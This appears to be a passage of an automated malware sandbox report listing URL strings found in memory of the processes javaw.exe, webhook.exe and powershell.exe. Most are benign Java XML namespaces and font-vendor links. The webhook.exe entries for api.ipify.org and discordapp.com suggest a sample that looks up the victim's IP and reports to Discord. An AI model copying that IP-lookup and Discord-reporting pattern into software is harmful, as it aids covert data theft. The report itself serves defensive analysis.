Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypes
Source: javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/xmlschema/1.0/anonymousTypesk
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.org
Source: webhook.exe, 00000003.00000002.1391090423.0000000002AC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.ipify.orgd
Source: javaw.exe, 00000005.00000002.3694422563.00000000099DA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://bugreport.sun.com/bugreport/
Source: powershell.exe, 00000008.00000002.1875355279.0000000002A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.micro
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://discordapp.com
Source: webhook.exe, 00000003.00000002.1391090423.0000000002B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://discordapp.comd
Source: webhook.exe, 00000003.00000000.1224355173.0000000000632000.00000002.00000001.01000000.00000008.sdmp String found in binary or memory: http://james.newtonking.com/projects/json
Source: javaw.exe, 00000005.00000002.3694422563.00000000099DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.oracle.com/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/jaxp/xpath/dom
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/jaxp/xpath/dom2
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/(
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/dom/properties/ancestor-check
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaLanguage4
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/jaxp/properties/schemaSource
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/ignore-external-dtd
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-state
Source: javaw.exe, javaw.exe, 00000005.00000003.1360100051.000000001528E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3302081083.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1355684652.0000000015204000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3698035742.0000000015292000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1558573934.0000000015294000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358921734.000000001525E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1510520893.0000000015294000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/reader-in-defined-stateml.FXML
Source: javaw.exe, 00000005.00000002.3694422563.0000000009FCA000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://java.sun.com/xml/stream/properties/report-cdata-event
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javafx.com/fxml
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javafx.com/fxml/1
Source: javaw.exe, 00000005.00000002.3694422563.0000000009E4E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javafx.com/javafx/8
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/feature/secure-processing8
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A3F1000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A216000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/
Source: javaw.exe, 00000005.00000003.1352883461.0000000018954000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1361741686.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3701921471.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.3315886520.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1356672689.000000001895B000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.000000001895B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/$
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalDTD?
Source: javaw.exe, 00000005.00000002.3696973585.0000000014D70000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalSchema
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.XMLConstants/property/accessExternalStylesheet0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMResult/feature0
Source: javaw.exe, 00000005.00000002.3694422563.000000000A45D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A286000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.dom.DOMSource/feature0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXResult/feature0
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXSource/feature
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.sax.SAXTransformerFactory/feature/xmlfilter4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stax.StAXResult/feature4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stax.StAXSource/featurep
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamResult/feature4
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamSource/featurep
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://javax.xml.transform.stream.StreamSource/featurep3
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: webhook.exe, 00000003.00000002.1391090423.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1903364315.0000000004838000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.1429649555.0000000005454000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 0000000E.00000002.1569667902.0000000004FA5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.1712907932.00000000075B5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.carterandcone.coml
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/?
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers8
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designers?
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.com/designersG
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: webhook.exe, 00000003.00000002.1464487192.0000000006700000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htmsk-sk
Source: webhook.exe, 00000003.00000002.1467233290.0000000007872000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/feature/use-service-mechanism
Source: javaw.exe, 00000005.00000003.1354265335.00000000189CE000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3702244002.00000000189CD000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A45D000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.000000000A286000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1509986145.00000000189C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/technetwork/java/javafx/index.html
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/is-standalone
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/;
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/XmlFeatureManager
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/enableExtensionFunctions
Source: javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityExpansionLimit
Source: javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/entityReplacementLimit9
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/getEntityCountInfo
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxElementDepth
Source: javaw.exe, 00000005.00000003.1557155721.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3693460852.0000000004375000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000003.1358879620.000000000436E000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000005.00000002.3694422563.0000000009DB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.oracle.com/xml/jaxp/properties/maxGeneralEntitySizeLimit
